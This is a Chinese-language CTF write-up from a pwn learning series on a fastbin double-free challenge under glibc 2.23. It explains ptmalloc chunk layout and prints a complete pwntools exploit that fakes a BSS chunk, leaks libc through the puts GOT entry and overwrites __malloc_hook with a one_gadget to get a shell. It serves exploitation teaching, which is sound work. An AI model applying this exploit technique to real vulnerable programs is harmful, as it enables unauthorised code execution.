Pwn学习总结(19):Heap-FastBin/fastbin

从这道题目开始,我们正式进入堆的世界~

由于最新版系统的libc版本升级后加入了tcache机制,我们只能使用旧版系统来完成后面一系列的入门级堆题目。我采用的系统是Ubuntu 16.04。

实验平台:

x86_64, Ubuntu 16.04.7 LTS, Kernel 4.15.0-142-generic
GLIBC 2.23-0ubuntu11.3

实验Binary及答案:https://github.com/bjrjk/pwn-learning/tree/main/FastBin/fastbin

ELF的保护措施:

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

没有开启PIE,可以覆写GOT表。

反编译后的结果如下:

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  init_stdFILE();
  puts("what's your name:");
  read(0, name_bss, 0x20uLL);
  printf("hello, %s", name_bss); // name_bss: 0x602100
  while ( 1 )
  {
    putchar('>');
    __isoc99_scanf("%d", &v3);
    if ( v3 == 1 )
      create();
    if ( v3 == 2 )
      delete();
    if ( v3 == 3 )
      print();
  }
}
void init_stdFILE()
{
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
}
unsigned __int64 create()
{
  int v0; // ebx
  _DWORD nbytes[7]; // [rsp+4h] [rbp-1Ch] BYREF

  *(_QWORD *)&nbytes[1] = __readfsqword(0x28u);
  printf("size ?");
  nbytes[0] = 0;
  __isoc99_scanf("%d", nbytes);
  if ( nbytes[0] < 0 || nbytes[0] > 128 || chunk_count > 11 )
    exit(0);
  v0 = chunk_count++;
  chunk[v0] = malloc(nbytes[0]);
  printf("data:");
  read(0, chunk[chunk_count - 1], nbytes[0]);
  chunk_size[chunk_count - 1] = nbytes[0];
  return __readfsqword(0x28u) ^ *(_QWORD *)&nbytes[1];
}
unsigned __int64 delete()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("index?");
  __isoc99_scanf("%d", &v1);
  if ( v1 < 0 || v1 > chunk_count )
    exit(0);
  free(chunk[v1]); //vulnerable
  return __readfsqword(0x28u) ^ v2;
}
unsigned __int64 print()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("index?");
  __isoc99_scanf("%d", &v1);
  if ( v1 < 0 || v1 > chunk_count )
    exit(0);
  puts((const char *)chunk[v1]);
  return __readfsqword(0x28u) ^ v2;
}

可以看出,C语言代码第57行处存在利用点。它仅仅将指针进行了free,却没有将指针清零。形成了悬空指针(dangling pointer)。

为了做这道题目,我们先来普及一些基本知识~

ptmalloc及chunk的基本介绍

Linux中glibc运行库采用的堆分配器是ptmalloc,绝大多数不使用自定义堆分配器的程序自然也就采用ptmalloc进行动态内存分配。

chunk是ptmalloc分配内存的基本单元,chunk中既包括内存块的元信息,也包括用户数据。

为了加快空闲内存块的分配速度,ptmalloc将空闲的chunk分为四类进行管理:fastbin, smallbin, largebin, unsortedbin,详细信息可参考[1]。chunk之间以双向链表进行连接,属于chunk中的元数据。

下面及后文中的介绍,都以amd64体系结构为例。

chunk的结构体定义为:

struct malloc_chunk {
  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
  struct malloc_chunk* fd;  /* double links -- used only if free. */
  struct malloc_chunk* bk;  /* ForwarD & BacK */
  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

其中INTERNAL_SIZE_T类型对于amd64体系结构为8字节,对i686体系结构为4字节。
指针类型同上。

该定义可能令人较为迷惑,建议仔细阅读下面的解释。

一个chunk的布局,在chunk占用或空闲时是不相同的。具体请见下面的ASCII图画[2]。

对于一个已经分配给用户的chunk,布局如图:

    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if unallocated (P clear)  |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of chunk, in bytes                     |A|M|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             User data starts here...                          .
            .                                                               .
            .             (malloc_usable_size() bytes)                      .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             (size of chunk, but used for application data)    |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of next chunk, in bytes                |A|0|1|
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

其中*chunk为ptmalloc管理chunk所使用的指针,*mem为用户所申请到内存的指针。amd64中,这两个指针之间差16个字节,保存的数据mchunk_prev_sizemchunk_size,分别是上一个虚拟地址连续chunk的大小(若该chunk为free状态)和当前chunk的大小。这两个大小都将头部的元数据计算在内。

若上一个虚拟地址连续的chunk已经被分配,则mchunk_prev_size所占用的位置不再保存该区块大小,而是作为上一chunk的用户内存区域。*nextchunk恰好所指的8字节也说明了这一点。

对于amd64体系结构,chunk堆块总是16(0x10)字节对齐的。对于i686,则是8字节对齐的。因此size的低3比特对于数据表示无效。ptmalloc将其拿来存储状态信息,分别记作A, M, P。

其中A是NON_MAIN_ARENA。ARENA指的是对于一个进程的多个线程,每个线程所独占的内存块区域。当该chunk不归主线程的堆分配器管理时,A位置为1。

M是IS_MMAPPED。指示该chunk直接由mmap系统调用分配,不属于一般的堆区域。

P是PREV_INUSE。若为1,指示上一个虚拟地址连续的chunk已经处在使用状态,则mchunk_prev_size无效。若为0,则上一个虚拟地址连续的chunk空闲,mchunk_prev_size有效。

对于一个空闲的chunk,布局如图:

    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if unallocated (P clear)  |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    `head:' |             Size of chunk, in bytes                     |A|0|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Forward pointer to next chunk in list             |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Back pointer to previous chunk in list            |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Unused space (may be 0 bytes long)                .
            .                                                               .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    `foot:' |             Size of chunk, in bytes                           |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of next chunk, in bytes                |A|0|0|
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

其它部分的解释说明同上,只是原本用户内存的部分被拿来进行*fd*bk的存储。分别指向了同类双向链表的下一个和上一个chunk。

double free的利用过程

利用double free,我们可以伪造一个任意位置的chunk,并使得malloc将其分配出去。

主要原理是:两次free chunk A之后,chunk A在一条bin链中出现两次。第一次用malloc获取chunk A时,以allocated形态填充unallocated形态的*fd指针域,使之指向伪造的chunk B。第二次用malloc获取chunk A时,ptmalloc读取*fd指针域并作为下一个即将分配的chunk。这样就会在下一次malloc时,将伪造的chunk分给用户程序。

需要注意的点包括:

  1. 我们不能连续两次调用free函数回收同一个指针。因为ptmalloc对于这种情况有特判。因此我们需要在free中间插一个,例如free的顺序可以是A, B, A。
  2. 伪造chunk时,当前区块的size域必须伪造正确,否则会被ptmalloc的完整性校验拒绝。

__malloc_hook的利用

在ptmalloc中,实现了对很多public函数的hook,即:如果我们想要实现自定义的堆分配器,可以覆写glibc中对应的hook指针。这样调用ptmalloc的对应功能时,控制流会被劫持到我们的自定义函数上。

对于堆题来说,我们一般只能控制数据,而很难操纵控制流。而double free操作__malloc_hook则提供了一个很好的转移控制流的方法。我们只要将libc中的One_gadget写入到__malloc_hook后,用户程序只要调用malloc,就会自动getshell,实在是非常方便了。

double free操作__malloc_hook的方法如下:

对于libc 2.23,可以将地址(char*)&__malloc_hook - 0x23处作为一个size为0x70的chunk进行伪造。进而我们可以填充 __malloc_hook 。不信你就动手试一下:)

假设我们没有调用malloc的机会,可以连续double free同一个指针,此时glibc的错误处理程序会替你调用malloc(笑死

Exp

在这道题目中,可以利用悬空指针实现double free,进而控制bss段上伪造的ptmalloc chunk,覆盖后面的数据区域,接下来实现任意地址读写。最后分别完成libc基址的泄露和写入one_gadget到__malloc_hook,进而实现getshell。

下面首先将Exp贴出,后续对上述解题概要进行大体的讲解。

#!/usr/bin/env python2
# coding = utf-8

# Env: Ubuntu 16.04.7 LTS, GLIBC 2.23-0ubuntu11.3, Kernel 4.15.0-142-generic

from pwn import *
from LibcSearcher import *
context(arch = "amd64", os = "linux", log_level = "debug")

def note_init(name):
    p.recvuntil("what's your name:\n")
    p.send(name)
    p.recvuntil('hello, ')

def note_create(size, data):
    p.recvuntil('>')
    p.sendline('1')
    p.recvuntil('size ?')
    p.sendline(str(size))
    p.recvuntil('data:')
    p.send(data)

def note_delete(index):
    p.recvuntil('>')
    p.sendline('2')
    p.recvuntil('index?')
    p.sendline(str(index))

def note_print(index):
    p.recvuntil('>')
    p.sendline('3')
    p.recvuntil('index?')
    p.sendline(str(index))

p = process('./fastbin')
elf = ELF('./fastbin')
# gdb.attach(p, "")

bss_name = 0x602100
puts_got_addr = elf.got['puts'] # 0x602028

# First Stage: Leak Libc
note_init(p64(0) + p64(0x80)) # set mchunk_prev_size & mchunk_size in malloc_chunk, chunk "bss_name"
note_create(0x70, 'a') # counterfeit a double free fastbin chain
note_create(0x70, 'a')
note_delete(0)
note_delete(1)
note_delete(0) # double free chunk[0]
note_create(0x70, p64(bss_name)) # fill *(&malloc_chunk+offsetof(fd)) (usermem) ,chunk 0
note_create(0x70, 'a') # chunk 1
note_create(0x70, 'a') # chunk 0
note_create(0x70, 'a' * 0x10 + p64(puts_got_addr)) # chunk on BSS: bss_name, overwrite chunk[0] to leak got['puts']
note_print(0)
puts_libc = u64(p.recv(6) + '\x00\x00')
log.info('puts_libc:' + str(hex(puts_libc)))
libc = LibcSearcher('puts', puts_libc)
libc_base = puts_libc - libc.dump('puts')
log.info('libc_base:' + str(hex(libc_base)))

# Second Stage: Overwrite __malloc_hook to one_gadget
malloc_hook_chunk = libc_base + libc.dump('__malloc_hook') - 0x23
log.info('malloc_hook_chunk:' + str(hex(malloc_hook_chunk)))
note_create(0x60, 'a') # counterfeit a double free fastbin chain
note_create(0x60, 'a')
note_delete(6)
note_delete(7)
note_delete(6) # double free chunk[6]
note_create(0x60, p64(malloc_hook_chunk)) # chunk 6
note_create(0x60, 'a') # chunk 7
note_create(0x60, 'a') # chunk 6
one_gadget = libc_base + 0xf03a4
note_create(0x60, 'a'* 0x13 + p64(one_gadget))
note_delete(0) # two consecutive free invoke user malloc 
note_delete(0)
p.interactive()

第43行,在程序的bss段伪造一个chunk区块,其中prev_size为0,size为0x80。

第44~48行,实现double free chunk[0]。

第49行,第一次写入chunk[0]的fd,指向伪造的bss_name chunk。

第52行,向bss_name写入内容,正好可以覆盖到note数组的地址。我们借此覆盖note[0]为puts的GOT表地址。

第53~58行,泄露libc基址。

第61~62行,获得伪造malloc_hook_chunk的地址。

第63~67行,进行double free chunk[6]。

第68行,第一次写入chunk[6]的fd,指向malloc_hook_chunk。

第72行,写入__malloc_hook为one_gadget。

第73行,在这道题目里,我们已经没机会再次调用malloc了,因此连续调用两次free,即可成功getshell。

PS: 在我的repo中还有一个answer2.py,是本题的另一种做法,大体思路相同。只是在第二次double free时减少了malloc的使用次数,使得能够直接用malloc执行one_gadget。只是可惜在我的机器上没有找到能用的one_gadget,约束都不满足。我以控制流能跳转到我指定的地址0xdeadbeefdeadbeef为准,也算是没问题了。

参考资料:
[1] https://blog.csdn.net/qq_41453285/article/details/96865321
[2] https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#1075

   malloc_chunk details:
    (The following includes lightly edited explanations by Colin Plumb.)
    Chunks of memory are maintained using a `boundary tag' method as
    described in e.g., Knuth or Standish.  (See the paper by Paul
    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
    survey of such techniques.)  Sizes of free chunks are stored both
    in the front of each chunk and at the end.  This makes
    consolidating fragmented chunks into bigger chunks very fast.  The
    size fields also hold bits representing whether chunks are free or
    in use.
    An allocated chunk looks like this:
    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if unallocated (P clear)  |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of chunk, in bytes                     |A|M|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             User data starts here...                          .
            .                                                               .
            .             (malloc_usable_size() bytes)                      .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             (size of chunk, but used for application data)    |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of next chunk, in bytes                |A|0|1|
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    Where "chunk" is the front of the chunk for the purpose of most of
    the malloc code, but "mem" is the pointer that is returned to the
    user.  "Nextchunk" is the beginning of the next contiguous chunk.
    Chunks always begin on even word boundaries, so the mem portion
    (which is returned to the user) is also on an even word boundary, and
    thus at least double-word aligned.
    Free chunks are stored in circular doubly-linked lists, and look like this:
    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of previous chunk, if unallocated (P clear)  |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    `head:' |             Size of chunk, in bytes                     |A|0|P|
      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Forward pointer to next chunk in list             |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Back pointer to previous chunk in list            |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Unused space (may be 0 bytes long)                .
            .                                                               .
            .                                                               |
nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    `foot:' |             Size of chunk, in bytes                           |
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
            |             Size of next chunk, in bytes                |A|0|0|
            +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
    chunk size (which is always a multiple of two words), is an in-use
    bit for the *previous* chunk.  If that bit is *clear*, then the
    word before the current chunk size contains the previous chunk
    size, and can be used to find the front of the previous chunk.
    The very first chunk allocated always has this bit set,
    preventing access to non-existent (or non-owned) memory. If
    prev_inuse is set for any given chunk, then you CANNOT determine
    the size of the previous chunk, and might even get a memory
    addressing fault when trying to do so.
    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
    main arena, described by the main_arena variable.  When additional
    threads are spawned, each thread receives its own arena (up to a
    configurable limit, after which arenas are reused for multiple
    threads), and the chunks in these arenas have the A bit set.  To
    find the arena for a chunk on such a non-main arena, heap_for_ptr
    performs a bit mask operation and indirection through the ar_ptr
    member of the per-heap header heap_info (see arena.c).
    Note that the `foot' of the current chunk is actually represented
    as the prev_size of the NEXT chunk. This makes it easier to
    deal with alignments etc but can be very confusing when trying
    to extend or adapt this code.
    The three exceptions to all this are:
     1. The special chunk `top' doesn't bother using the
        trailing size field since there is no next contiguous chunk
        that would have to index off it. After initialization, `top'
        is forced to always exist.  If it would become less than
        MINSIZE bytes long, it is replenished.
     2. Chunks allocated via mmap, which have the second-lowest-order
        bit M (IS_MMAPPED) set in their size fields.  Because they are
        allocated one-by-one, each must contain its own trailing size
        field.  If the M bit is set, the other bits are ignored
        (because mmapped chunks are neither in an arena, nor adjacent
        to a freed chunk).  The M bit is also used for chunks which
        originally came from a dumped heap via malloc_set_state in
        hooks.c.
     3. Chunks in fastbins are treated as allocated chunks from the
        point of view of the chunk allocator.  They are consolidated
        with their neighbors only in bulk, in malloc_consolidate.

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注